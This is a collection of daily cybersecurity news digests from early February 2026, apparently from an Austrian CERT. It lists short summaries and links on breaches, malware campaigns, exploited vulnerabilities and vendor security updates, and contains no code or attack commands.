Cybersecurity researchers have discovered a new supply chain attack in which legitimate packages on npm and the Python Package Index (PyPI) repository have been compromised to push malicious versions to facilitate wallet credential theft and remote code execution.

https://thehackernews.com/2026/02/compromised-dydx-npm-and-pypi-packages.html

Claude Opus 4.6 Finds 500+ High-Severity Flaws Across Major Open-Source Libraries

Artificial intelligence (AI) company Anthropic revealed that its latest large language model (LLM), Claude Opus 4.6, has found more than 500 previously unknown high-severity security flaws in open-source libraries, including Ghostscript, OpenSC, and CGIF.

https://thehackernews.com/2026/02/claude-opus-46-finds-500-high-severity.html

Datenleck bei Substack: Datensatz mit knapp 700.000 Einträgen im Netz

Cyberkriminelle haben Daten bei Substack abgezogen. Der Datensatz umfasst rund 700.000 Einträge und ist im Netz verfügbar.

https://heise.de/-11167482

Angriff per Signal: BfV und BSI warnen Politiker, Militärs und Diplomaten

Ein vergangene Woche bekannt gewordener Angriff auf Nutzer des Messengers Signal zielt auf Bundestagsabgeordnete und andere wichtige Personen ab.

https://heise.de/-11168254

Vulnerabilities

Security updates for Friday

Security updates have been issued by AlmaLinux (freerdp, kernel, python3, and python3.12-wheel), Debian (alsa-lib, chromium, openjdk-25, phpunit, tomcat10, tomcat11, and tomcat9), Fedora (openqa, pgadmin4, phpunit10, phpunit11, phpunit12, phpunit8, phpunit9, and yarnpkg), Mageia (python-django), SUSE (alloy, cups, dpdk, expat, glib2, java-1_8_0-ibm, java-1_8_0-openj9, java-25-openjdk, kernel, libpainter0, libsoup, libxml2, openssl-3, python-filelock, python-wheel, python312-Django6, thunderbird, traefik2, udisks2, wireshark, and xen), and Ubuntu (glib2.0, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, python3.14, python3.13, python3.12, python3.11, python3.10, python3.9, python3.8, python3.7, python3.6, python3.5, python3.4, and tracker-miners).

https://lwn.net/Articles/1057506/

TeamViewer: Lücke erlaubt Zugriffe ohne vorherige Bestätigung

In TeamViewer wurde eine Sicherheitslücke entdeckt, die angemeldeten Angreifern Zugriffe auf Ressourcen erlaubt, bevor diese Berechtigung lokal bestätigt wurde. Aktualisierte Software-Pakete stehen bereit, um die Schwachstelle zu beheben. IT-Verantwortliche, die TeamViewer einsetzen, sollten zügig updaten.

https://www.heise.de/news/TeamViewer-Luecke-erlaubt-Zugriffe-ohne-vorherige-Bestaetigung-11167398.html

Sicherheitsupdates F5 BIG-IP: Angreifer können Datenverkehr lahmlegen

Setzen Angreifer erfolgreich an Sicherheitslücken in BIG-IP-Appliances wie Advanced WAF/ASM oder APM an, können sie Abstürze auslösen oder eigentlich geschützte Daten einsehen. Dagegen stehen abgesicherte Versionen zum Download bereit. Bislang gibt es keine Berichte zu Attacken.

https://heise.de/-11167422

DSA-6122-1 chromium - security update

https://lists.debian.org/debian-security-announce/2026/msg00031.html

TP-Link Systems Inc. VIGI Series IP Camera

https://www.cisa.gov/news-events/ics-advisories/icsa-26-036-01

Tageszusammenfassung - 05.02.2026

2026-02-05T18:22:56Z

End-of-Day report

Timeframe: Mittwoch 04-02-2026 18:00 - Donnerstag 05-02-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Zendesk spam wave returns, floods users with Activate account emails

A fresh wave of spam is hitting inboxes worldwide, with users reporting that they are once again being bombarded by automated emails generated through companies unsecured Zendesk support systems. Some recipients say they are receiving hundreds of messages with strange or alarming subject lines.

https://www.bleepingcomputer.com/news/security/zendesk-spam-wave-returns-floods-users-with-activate-account-emails/

CISA: VMware ESXi flaw now exploited in ransomware attacks

CISA confirmed on Wednesday that ransomware gangs have begun exploiting a high-severity VMware ESXi sandbox escape vulnerability that was used in zero-day attacks since at least February 2024. Broadcom patched this ESXi arbitrary-write vulnerability (tracked as CVE-2025-22225) almost one year ago, in March 2025, alongside a memory leak (CVE-2025-22226) and a TOCTOU flaw (CVE-2025-22224), and tagged them all as actively exploited zero-days.

https://www.bleepingcomputer.com/news/security/cisa-vmware-esxi-flaw-now-exploited-in-ransomware-attacks/

Broken Phishing URLs, (Thu, Feb 5th)

For a few days, many phishing emails that landed into my mailbox contain strange URLs. [..] But the format of the URLs is broken! In a URL, parameters are extra pieces of information added after a question mark (?) to tell a website more details about a request; they are written as name=value pairs (for example -email=user@domain-), and multiple parameters are separated by an ampersand (&). [..] Threat actors implement this to break security controls.

https://isc.sans.edu/diary/rss/32686

Three clues that your LLM may be poisoned with a sleeper-agent back door

The threat sees an attacker embed a hidden backdoor into the model's weights - the importance assigned to the relationship between pieces of information - during its training. Attackers can activate the backdoor using a predefined phrase. [..] In a research paper [PDF] published this week, Kumar and coauthors detailed a lightweight scanner to help enterprises detect backdoored models.

https://go.theregister.com/feed/www.theregister.com/2026/02/05/llm_poisoned_how_to_tell/

Technical Analysis of Marco Stealer

Zscaler ThreatLabz has discovered an information stealer that we named Marco Stealer, which was first observed in June 2025. Marco Stealer primarily targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim-s system. Marco Stealer implements several anti-analysis techniques including string encryption and terminating security tools.

https://www.zscaler.com/blogs/security-research/technical-analysis-marco-stealer

The Shadow Campaigns: Uncovering Global Espionage

This investigation unveils a new cyberespionage group that Unit 42 tracks as TGR-STA-1030. We refer to the group-s activity as the Shadow Campaigns. [..] Over the past year, this group has compromised government and critical infrastructure organizations across 37 countries. This means that approximately one out of every five countries has experienced a critical breach from this group in the past year.

https://unit42.paloaltonetworks.com/shadow-campaigns-uncovering-global-espionage/

Black Basta: Defense Evasion Capability Embedded in Ransomware Payload

Normally the BYOVD defense evasion component of an attack would involve a distinct tool that would be deployed on the system prior to the ransomware payload in order to disable security software. However, in this attack, the vulnerable driver (an NsecSoft NSecKrnl driver) was bundled with the ransomware itself.

https://www.security.com/threat-intelligence/black-basta-ransomware-byovd

Knife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework

Cisco Talos uncovered -DKnife,- a fully featured gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants that perform deep-packet inspection, manipulate traffic, and deliver malware via routers and edge devices. [..] DKnife-s attacks target a wide range of devices, including PCs, mobile devices, and Internet of Things (IoT) devices. It delivers and interacts with the ShadowPad and DarkNimbus backdoors by hijacking binary downloads and Android application updates.

https://blog.talosintelligence.com/knife-cutting-the-edge/

Sanctioned Bulletproof Host Linked to Hijacking of Old Home Routers

Compromised home routers in 30+ countries had DNS traffic redirected, sending users to malicious sites while normal browsing appeared unaffected. [..] According to Infoblox, the manipulated DNS traffic was routed to resolvers hosted by Aeza International, a Russian bulletproof hosting provider sanctioned by the US government in July 2025.

https://hackread.com/sanctioned-bulletproof-host-hijack-old-home-routers/

How to write your first obfuscator of Java Bytecode

In this article I describe Java bytecode obfuscation, using one of the challenges I did in 2023 as part of the interviews with Quarkslab for the position of Java compiler engineer in QShield.

http://blog.quarkslab.com/how-to-write-your-first-obfuscator-of-java-bytecode.html

Vulnerabilities

Cisco Security Advisories 05.02.2026

Cisco Meeting Management, Cisco Secure Web Appliance, Cisco TelePresence Collaboration Endpoint Software and RoomOS, Cisco Prime Infrastructure, Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure,

https://sec.cloudapps.cisco.com/security/center/Search.x?publicationTypeIDs=1&firstPublishedStartDate=2026%2F02%2F04&firstPublishedEndDate=2026%2F02%2F05&pageNum=1&isRenderingBugList=false&isRenderingCveList=false&isRenderingCveAdvisoryList=false

Security updates for Thursday

Security updates have been issued by AlmaLinux (brotli, curl, kernel, python-wheel, and python3.12), Debian (containerd), Fedora (gnupg2, pgadmin4, phpunit10, phpunit11, phpunit12, phpunit8, phpunit9, and yarnpkg), Mageia (expat), Oracle (qemu-kvm and util-linux), Red Hat (kernel, kernel-rt, opentelemetry-collector, and python3.12-wheel), SUSE (abseil-cpp, dpdk, freerdp, glib2, ImageMagick, java-11-openj9, java-17-openj9, java-1_8_0-ibm, java-1_8_0-openj9, java-1_8_0-openjdk, java-21-openj9, kernel, libsoup, libsoup-3_0-0, openssl-3, patch, python-Django, rekor, rizin, udisks2, and xrdp), and Ubuntu (gh, linux, linux-aws, linux-azure, linux-azure-5.15, linux-gcp, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle, linux-raspi, linux, linux-aws, linux-azure, linux-gcp, linux-oem-6.17, linux-oracle, linux-raspi, linux-realtime, linux, linux-gke, linux-gkeop, linux-hwe-6.8, linux-oracle, linux-oracle-6.8, linux-raspi, linux-fips, linux-aws-fips, linux-azure-fips, linux-gcp-fips, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-realtime, linux-intel-iot-realtime, and linux-realtime, linux-realtime-6.8, linux-raspi-realtime).

https://lwn.net/Articles/1057381/

Automatisierungstool n8n: Weitere kritische Lücken gestopft

Im Automatisierungstool n8n haben die Entwickler weitere Sicherheitslücken gestopft. Ein Update auf die jüngste Fassung ist empfehlenswert. [..] Eine Auflistung der neuen CVE-Einträge nach Schweregrad sortiert bietet jedoch einen Überblick, Details finden sich auf der n8n-Sicherheitsseite.

https://heise.de/-11165845

Splunk: SVD-2026-0201: Third-Party Package Updates in Splunk SOAR - February 2026

https://advisory.splunk.com//advisories/SVD-2026-0201

Splunk: SVD-2025-1205: Incorrect permissions assignment on Splunk Enterprise for Windows during new installation or upgrade

https://advisory.splunk.com//advisories/SVD-2025-1205

Zyxel security advisory for post-authentication command injection vulnerability in the DDNS configuration CLI command of ZLD firewalls

https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-vulnerability-in-the-ddns-configuration-cli-command-of-zld-firewalls-02-05-2026

Patchday Android: Treiberlücke gefährdet Pixel-Smartphones

https://heise.de/-11165905

Tageszusammenfassung - 04.02.2026

2026-02-04T18:24:13Z

End-of-Day report

Timeframe: Dienstag 03-02-2026 18:00 - Mittwoch 04-02-2026 18:00 Handler: Alexander Riepl Co-Handler: n/a

News

Wave of Citrix NetScaler scans use thousands of residential proxies

A coordinated reconnaissance campaign targeting Citrix NetScaler infrastructure over the past week used tens of thousands of residential proxies to discover login panels.

https://www.bleepingcomputer.com/news/security/wave-of-citrix-netscaler-scans-use-thousands-of-residential-proxies/

Schlüssel kaputt: Weitere Ransomware-Panne führt zu Totalverlust

In der Nitrogen-Ransomware klafft ein Bug, der alle Lösegeldverhandlungen ad absurdum führt. Die Daten können nicht mehr entschlüsselt werden.

https://www.golem.de/news/schluessel-kaputt-weitere-ransomware-panne-fuehrt-zu-totalverlust-2602-204974.html

AI agents cant yet pull off fully autonomous cyberattacks - but they are already very helpful to crims

Dont relax: This is a when, not if scenario AI agents and other systems cant yet conduct cyberattacks fully on their own - but they can help criminals in many stages of the attack chain, according to the International AI Safety report.

https://www.theregister.com/2026/02/03/autonomous_cyberattacks_not_real_yet/

Clouds rush to deliver OpenClaw-as-a-service offerings

As analyst house Gartner declares AI tool -comes with unacceptable cybersecurity risk- and urges admins to snuff it out If you-re brave enough to want to run the demonstrably insecure AI assistant OpenClaw, several clouds have already started offering it as a service.

https://www.theregister.com/2026/02/04/cloud_hosted_openclaw/

Angriffe auf Solarwinds Web Help Desk, FreePBX und Gitlab beobachtet

Die CISA warnt vor jüngst beobachteten Angriffen auf Sicherheitslücken in Solarwinds Web Help Desk, FreePBX und Gitlab.

https://www.heise.de/news/Angriffe-auf-Solarwinds-Web-Help-Desk-FreePBX-und-Gitlab-beobachtet-11164498.html

Phishing: Falsche Cloud-Speicher-Warnung nachverfolgt

Phishing-Mails zielen nicht nur direkt auf Zugangsdaten ab, sondern bringen Opfer öfter zu Affiliate-Marketing-Seiten.

https://www.heise.de/news/Phishing-Falsche-Cloud-Speicher-Warnung-nachverfolgt-11164973.html

Gesucht: Notfallhandwerksdienst, Gefunden: Vermittlungsagentur

Hinter zahlreichen Webseiten von Notfallinstallateuren, Schlüsseldiensten und ähnlichen Unternehmen stecken gar keine Handwerksbetriebe, sondern lediglich Vermittlungsagenturen. Das ist nicht illegal, kann für Betroffene aber dennoch unangenehme Folgen haben. Woran man die Webauftritte der Agenturen erkennt und wie man am besten für den Ernstfall vorsorgt.

https://www.watchlist-internet.at/news/vermittlungsagentur-statt-handwerksdienst/

Exclusive: US used cyber weapons to disrupt Iranian air defenses during 2025 strikes

The U.S. military digitally disrupted Iranian air missile defense systems during its operation last year against the country-s nuclear program, some of the most sophisticated action Cyber Command has taken to date against Iran.

https://therecord.media/iran-nuclear-cyber-strikes-us

Phishing Campaigns Abuse Trusted Cloud Platforms, Raising New Risks for Enterprises

ANY.RUN experts report a surge in phishing campaigns abusing trusted cloud and CDN platforms to bypass security controls and target enterprise users.

https://hackread.com/phishing-campaigns-cloud-platforms-enterprises-risks/

React Server Components Exploitation Consolidates as Two IPs Generate Majority of Attack Traffic

Two months after CVE-2025-55182 was disclosed on December 3, 2025, exploitation activity targeting React Server Components has consolidated significantly.

https://www.greynoise.io/blog/react2shell-exploitation-consolidates

Native Sysmon-Integration in Windows rückt näher

Microsoft hat Windows-Insider-Vorschauen veröffentlicht, die das mächtige Sysmon-Protokollierungstool als Windows-Feature mitbringen.

https://heise.de/-11164696

Phishing: Falsche Cloud-Speicher-Warnung nachverfolgt

Phishing-Mails zielen nicht nur direkt auf Zugangsdaten ab, sondern bringen Opfer öfter zu Affiliate-Marketing-Seiten.

https://heise.de/-11164973

Web Traffic Hijacking: When Your Nginx Configuration Turns Malicious

Datadog Security Research has identified an active web traffic hijacking campaign that targets NGINX installations and management panels like Baota (BT). In this post, we provide our analysis of the techniques this campaign uses and share indicators of compromise you can check for in your NGINX configurations.

https://securitylabs.datadoghq.com/articles/web-traffic-hijacking-nginx-configuration-malicious/

Vulnerabilities

Critical Vulnerability Alert: CVE-2025-40551 in SolarWinds Web Help Desk

https://www.bitsight.com/blog/cve-2025-40551-solarwinds-critical-vulnerability

Tageszusammenfassung - 03.02.2026

2026-02-03T19:23:28Z

End-of-Day report

Timeframe: Montag 02-02-2026 18:00 - Dienstag 03-02-2026 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer

News

Aktive Ausnutzung von Sicherheitslücken in Ivanti Endpoint Manager Mobile (CVE-2026-1281, CVE-2026-1340)

Zwei kürzlich behobene Sicherheitslücken in Ivanti Endpoint Manager Mobile (CVE-2026-1281 und CVE-2026-1340, siehe dazu unsere Warnung vom 31.01.2026 sowie eine technische Analyse der Sicherheitsexpert:innen von Watchtowr) werden bereits von Bedrohungsakteuren ausgenutzt. Laut Ivanti selbst ist die Untersuchung der bisher bekannten Vorfälle noch im Gange und verlässliche technische Indikatoren liegen noch nicht vor.

https://www.cert.at/de/aktuelles/2026/2/aktive-ausnutzung-von-sicherheitslucken-in-ivanti-endpoint-manager-mobile-cve-2026-1281-cve-2026-1340

Hackers exploit critical React Native Metro bug to breach dev systems

Hackers are targeting developers by exploiting the critical vulnerability CVE-2025-11953 in the Metro server for React Native to deliver malicious payloads for Windows and Linux.

https://www.bleepingcomputer.com/news/security/hackers-use-critical-react-native-metro-bug-to-breach-dev-systems/

Iron Mountain: Data breach mostly limited to marketing materials

Iron Mountain, a leading data storage and recovery services company, says that a recent breach claimed by the Everest extortion gang is limited to mostly marketing materials.

https://www.bleepingcomputer.com/news/security/iron-mountain-data-breach-mostly-limited-to-marketing-materials/

Attackers Harvest Dropbox Logins Via Fake PDF Lures

A malware-free phishing campaign targets corporate inboxes and asks employees to view "request orders," ultimately leading to Dropbox credential theft.

https://www.darkreading.com/cloud-security/attackers-harvest-dropbox-logins-fake-pdf-lures

Detecting and Monitoring OpenClaw (clawdbot, moltbot)

Last week, a new AI agent framework was introduced to automate "live". It targets office work in particular, focusing on messaging and interacting with systems. The tool has gone viral not so much because of its features, which are similar to those of other agent frameworks, but because of a stream of security oversights in its design.

https://isc.sans.edu/diary/rss/32678

Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users

A security audit of 2,857 skills on ClawHub has found 341 malicious skills across multiple campaigns, according to new findings from Koi Security, exposing users to new supply chain risks. ClawHub is a marketplace designed to make it easy for OpenClaw users to find and install third-party skills.

https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html

APT28 Leverages CVE-2026-21509 in Operation Neusploit

In January 2026, Zscaler ThreatLabz identified a new campaign in-the-wild, tracked as Operation Neusploit, targeting countries in the Central and Eastern European region. In this campaign, the threat actor leveraged specially crafted Microsoft RTF files to exploit CVE-2026-21509 and deliver malicious backdoors in a multi-stage infection chain.

https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit

Neue Runde für den Dauerbrenner: Phishing-SMS im Namen von FinanzOnline

Wirklich zum Stillstand kam die Betrugsmasche ohnehin nie, aktuell ist aber eine Welle von besonderem Ausmaß zu beobachten. Es geht um die fast schon klassischen Phishing-SMS im Namen von FinanzOnline, die vor einem Ablaufen der Registrierung warnen. In Wahrheit haben es Kriminelle auf die Kontakt- und Bankdaten ihrer Opfer abgesehen.

https://www.watchlist-internet.at/news/phishing-sms-finanzonline/

WhatsApp Encryption, a Lawsuit, and a Lot of Noise

It-s not every day that we see mainstream media get excited about encryption apps! For that reason, the past several days have been fascinating, since we-ve been given not one but several unusual stories about the encryption used in WhatsApp.

https://blog.cryptographyengineering.com/2026/02/02/whatsapp-encryption-a-lawsuit-and-a-lot-of-noise/

The art of the invisible key: Passkey global breakthrough

Introduction Passkeys now protects billions of accounts, redefining how the world signs in through stronger, more secure authentication without a password. Yet this global movement runs deeper.

https://www.cyberark.com/resources/threat-research-blog/the-art-of-the-invisible-key-passkey-global-breakthrough

The Chrysalis Backdoor: A Deep Dive into Lotus Blossom-s toolkit

Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central America, focusing on government, telecom, aviation, critical infrastructure, and media sectors.

https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/

Vulnerabilities

Sicherheitsupdate: Unbefugte Zugriffe auf WatchGuard Firebox vorstellbar

Angreifer können auf Firebox-Firewalls von WatchGuard zugreifen. Reparierte Fireware-OS-Version stehen zum Download bereit.

https://www.heise.de/news/Sicherheitsupdate-Unbefugte-Zugriffe-auf-WatchGuard-Firebox-vorstellbar-11163128.html

Critical vLLM Flaw Exposes Millions of AI Servers to Remote Code Execution

A newly disclosed security flaw has placed millions of AI servers at risk after researchers identified a critical vulnerability in vLLM, a widely deployed Python package for serving large language models. The issue, tracked as CVE-2026-22778 (GHSA-4r2x-xpjr-7cvv), enables remote code execution (RCE) by submitting a malicious video URL to a vulnerable vLLM API endpoint. The vulnerability affects vLLM versions 0.8.3 through 0.14.0 and was patched in version 0.14.1.

https://thecyberexpress.com/cve-2026-22778-vllm-rce-malicious-video-link/

ZDI-26-043: (0Day) npm cli Uncontrolled Search Path Element Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of npm cli. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2026-0775.

http://www.zerodayinitiative.com/advisories/ZDI-26-043/

Micropatches released for Microsoft Excel Remote Code Execution Vulnerability (CVE-2025-62203)

November 2025 Windows Updates brought a patch for CVE-2025-62203, a remote code execution vulnerability in Microsoft Excel that could allow a remote attacker to have their malicious code executed on users computer upon opening an Excel file. The vulnerability was discovered and reported to Microsoft by Quan Jin with DBAPPSecurity.

https://blog.0patch.com/2026/02/micropatches-released-for-microsoft.html

Security updates for Tuesday

Security updates have been issued by AlmaLinux (fence-agents, gcc-toolset-15-binutils, golang-github-openprinting-ipp-usb, iperf3, kernel, kernel-rt, openssl, osbuild-composer, php:8.2, python3, util-linux, and wireshark), Debian (clamav and xrdp), Fedora (gimp and openttd), Mageia (docker-containerd), Oracle (gimp:2.8, golang-github-openprinting-ipp-usb, grafana-pcp, image-builder, iperf3, kernel, openssl, osbuild-composer, php, php:8.2, php:8.3, python3.9, util-linux, and wireshark), SUSE (cockpit-subscriptions, elemental-register, elemental-toolkit, glibc, gpg2, logback, openssl-1_1, python-urllib3, ucode-amd, and unbound), and Ubuntu (inetutils, libpng1.6, mysql-8.0, mysql-8.4, openjdk-17, openjdk-17-crac, openjdk-21, openjdk-21-crac, openjdk-25, openjdk-25-crac, openjdk-8, openjdk-lts, and thunderbird).

https://lwn.net/Articles/1057047/

Jetzt updaten! Angreifer übernehmen SmarterMail-Instanzen als Admin

Alle drei mittlerweile in SmarterMail 100.0.9511 geschlossenen Sicherheitslücken (CVE-2026-23760), CVE-2026-24423, CVE-2025-52691) sind mit dem Bedrohungsgrad -kritisch- eingestuft. Alle vorigen Ausgaben sollen verwundbar sein. Der US-Sicherheitsbehörde CISA zufolge nutzen Angreifer die ersten beiden Schwachstellen bereits aus.

https://heise.de/-11163471

Improper file access permission settings in Mitsubishi Small-Capacity UPS Shutdown Software FREQSHIP-mini for Windows

https://jvn.jp/en/jp/JVN64883963/

Kubernetes CVE-2026-24514: ingress-nginx Admission Controller denial of service

https://github.com/kubernetes/kubernetes/issues/136680

Kubernetes CVE-2026-24513: ingress-nginx auth-url protection bypass

https://github.com/kubernetes/kubernetes/issues/136679

Kubernetes CVE-2026-24512: ingress-nginx rules.http.paths.path nginx configuration injection

https://github.com/kubernetes/kubernetes/issues/136678

Kuberenetes CVE-2026-1580: ingress-nginx auth-method nginx configuration injection***
https://github.com/kubernetes/kubernetes/issues/136677

Tageszusammenfassung - 02.02.2026

2026-02-02T19:51:16Z

End-of-Day report

Timeframe: Freitag 30-01-2026 18:00 - Montag 02-02-2026 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl

News

Cloud storage payment scam floods inboxes with fake renewals

Over the past few months, a large-scale cloud storage subscription scam campaign has been targeting users worldwide with repeated emails falsely warning recipients that their photos, files, and accounts are about to be blocked or deleted due to an alleged payment failure.

https://www.bleepingcomputer.com/news/security/cloud-storage-payment-scam-floods-inboxes-with-fake-renewals/

NationStates confirms data breach, shuts down game site

NationStates, a multiplayer browser-based game, has confirmed a data breach after taking its website offline earlier this week to investigate a security incident.

https://www.bleepingcomputer.com/news/security/nationstates-confirms-data-breach-shuts-down-game-site/

Panera Bread breach impacts 5.1 million accounts, not 14 million customers

The data breach notification service Have I Been Pwned says that a data breach at the U.S. food chain Panera Bread affected 5.1 million accounts, not 14 million customers as previously reported.

https://www.bleepingcomputer.com/news/security/panera-bread-data-breach-impacts-51-million-accounts-not-14-million-customers/

Spionagegefahr: Verfassungsschutz warnt vor E-Autos aus China

E-Autos aus China könnten theoretisch ferngesteuert werden. Die technischen Risiken sind dokumentiert - doch auch Tesla sammelt massenhaft Daten.

https://www.golem.de/news/spionagegefahr-verfassungsschutz-warnt-vor-e-autos-aus-china-2602-204851.html

Texteditor: Notepad++-Server gehackt und Update-Traffic manipuliert

Angreifern ist es gelungen, die Update-Infrastruktur von Notepad++ zu kompromittieren und Traffic umzuleiten. Der Entwickler entschuldigt sich.

https://www.golem.de/news/texteditor-notepad-server-gehackt-und-update-traffic-manipuliert-2602-204876.html

Breaking the Sound Barrier, Part II: Exploiting CVE-2024-54529

In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-54529) and a double-free vulnerability (CVE-2025-31235) in the coreaudiod system daemon through a process I call knowledge-driven fuzzing. While the first post focused on the process of finding the vulnerabilities, this post dives into the intricate process of exploiting the type confusion vulnerability.

https://projectzero.google/2026/01/sound-barrier-2.html

Google Presentations Abused for Phishing

Charlie, one of our readers, has forwarded an interesting phishing email. The email was sent to users of the Vivladi Webmail service.

https://isc.sans.edu/diary/rss/32668

AI Coding Assistants Secretly Copying All Code to China

There-s a new report about two AI coding assistants, used by 1.5 million developers, that are surreptitiously sending a copy of everything they ingest to China.Maybe avoid using them.

https://www.schneier.com/blog/archives/2026/02/ai-coding-assistants-secretly-copying-all-code-to-china.html

Shadow Directories: A Unique Method to Hijack WordPress Permalinks

Last month, while working on a WordPress cleanup case, a customer reached out with a strange complaint: their website looked completely normal to them and their visitors, but Google search results were showing something very different. Instead of normal titles and descriptions, Google was displaying casino and gambling-related content. We have been seeing rising cases of spam on WordPress websites. What made this even more confusing was where the spam was appearing.

https://blog.sucuri.net/2026/01/shadow-directories-a-unique-method-to-hijack-wordpress-permalinks.html

Ex-Google Engineer Convicted for Stealing AI Secrets for China Startup

A former Google engineer accused of stealing thousands of the companys confidential documents to build a startup in China has been convicted in the U.S., the Department of Justice (DoJ) announced Thursday.

https://thehackernews.com/2026/01/ex-google-engineer-convicted-for.html

Open VSX Supply Chain Attack Used Compromised Dev Account to Spread GlassWorm

Cybersecurity researchers have disclosed details of a supply chain attack targeting the Open VSX Registry in which unidentified threat actors compromised a legitimate developers resources to push malicious updates to downstream users.

https://thehackernews.com/2026/02/open-vsx-supply-chain-attack-used.html

eScan Antivirus Update Servers Compromised to Deliver Multi-Stage Malware

The update infrastructure for eScan antivirus, a security solution developed by Indian cybersecurity company MicroWorld Technologies, has been compromised by unknown attackers to deliver a persistent downloader to enterprise and consumer systems.

https://thehackernews.com/2026/02/escan-antivirus-update-servers.html

Sicherheitslücke: Tausch weiterer elektronischer Heilberufsausweise in Arbeit

Kunden von D-Trust und SHC+Care müssen ihre bereits ECC-fähigen elektronischen Heilberufsausweise (eHBA) tauschen. Wie viele das betrifft, ist unklar.

https://www.heise.de/news/Digital-Health-Tausch-weiterer-E-Heilberufsausweise-wegen-Sicherheitsluecke-11161151.html

Anonymisierendes Linux: Notfall-Update Tails 7.4.1 erschienen

Die auf Anonymität im Netz ausgerichtete Linux-Distribution Tails ist in Version 7.4.1 erschienen - ein Notfall-Update.

https://www.heise.de/news/Anonymisierendes-Linux-Notfall-Update-Tails-7-4-1-erschienen-11162314.html

Please Don-t Feed the Scattered Lapsus Shiny Hunters

A prolific data ransom gang that calls itself Scattered Lapsus ShinyHunters (SLSH) has a distinctive playbook when it seeks to extort payment from victim firms: Harassing, threatening and even swatting executives and their families, all while notifying journalists and regulators about the extent of the intrusion.

https://krebsonsecurity.com/2026/02/please-dont-feed-the-scattered-lapsus-shiny-hunters/

How fake party invitations are being used to install remote access tools

-You-re invited!- It sounds friendly, familiar and quite harmless. But in a scam we recently spotted, that simple phrase is being used to trick victims into installing a full remote access tool on their Windows computers-giving attackers complete control of the system.

https://www.malwarebytes.com/blog/threat-intel/2026/02/how-fake-party-invitations-are-being-used-to-install-remote-access-tools

Microsoft erklärt NTLM als "deprecated" - Deaktivierung in nächster Windows-Version

Microsoft hat die veraltete NTLM-Authentifizierung in Windows als "deprecated" erklärt. In der nächsten Windows Version (Server und Client) wird NTLM standardmäßig deaktiviert und die Kerberos-Authentifizierung Standard. Damit neigt sich die Verwendung von NTLM seinem Ende zu.

https://borncity.com/blog/2026/02/01/microsoft-erklaert-ntlm-als-deprecated-deaktivierung-in-naechster-server-version/

US Seizes $400 Million Linked to Helix Dark Web Crypto Mixer

US authorities take control of over $400 million in crypto, cash, and property tied to Helix, a major darknet bitcoin mixing service used by drug markets.

https://hackread.com/us-seizes-400m-helix-dark-web-crypto-mixer/

Windows Malware Uses Pulsar RAT for Live Chats While Stealing Data

We usually think of computer viruses as silent, invisible programs running in the background, but a worrying discovery shows that modern hackers are getting much more personal.

https://hackread.com/windows-malware-pulsar-rat-live-chats-steal-data/

Guidance from the Frontlines: Proactive Defense Against ShinyHunters-Branded Data Theft Targeting SaaS

Mandiant is tracking a significant expansion and escalation in the operations of threat clusters associated with ShinyHunters-branded extortion. As detailed in our companion report, 'Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft', these campaigns leverage evolved voice phishing (vishing) and victim-branded credential harvesting to successfully compromise single sign-on (SSO) credentials and enroll unauthorized devices into victim multi-factor authentication (MFA) solutions.

https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas/

Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft

Mandiant has identified an expansion in threat activity that uses tactics, techniques, and procedures (TTPs) consistent with prior ShinyHunters-branded extortion operations. These operations primarily leverage sophisticated voice phishing (vishing) and victim-branded credential harvesting sites to gain initial access to corporate environments by obtaining single sign-on (SSO) credentials and multi-factor authentication (MFA) codes.

https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft/

Manic Monday: A Day in the Life of Threat Hunting

Discover a day in the life of threat hunting with Bitsight Adversary Intelligence. Learn how security teams detect and disrupt threats before damage is done.

https://www.bitsight.com/blog/day-in-the-life-threat-hunting

Someone Knows Bash Far Too Well, And We Love It (Ivanti EPMM Pre-Auth RCEs CVE-2026-1281 & CVE-2026-1340)

When Ivanti removed the embargoes from CVE-2026-1281 and CVE-2026-1340 - actively exploited pre-auth Remote Command Execution vulnerabilities in Ivanti-s Endpoint Manager Mobile (EPMM) solution - we sighed with relief. Clearly, the universe had decided to continue mocking Secure-By-Design signers right on schedule - every January.

https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/

The European Space Agency got hacked, and now we own the domain used!

It's not often that two of my interests align so well, but we're talking about space rockets and cyber security! Whilst Magecart and Magecart-style attacks might not be the most common attack vector at the moment, they are still happening with worrying frequency, and they are still catching out some pretty big organisations.

https://scotthelme.ghost.io/the-european-space-agency-got-hacked-and-now-we-own-the-domain-used/

archive.today is directing a DDOS attack against my blog

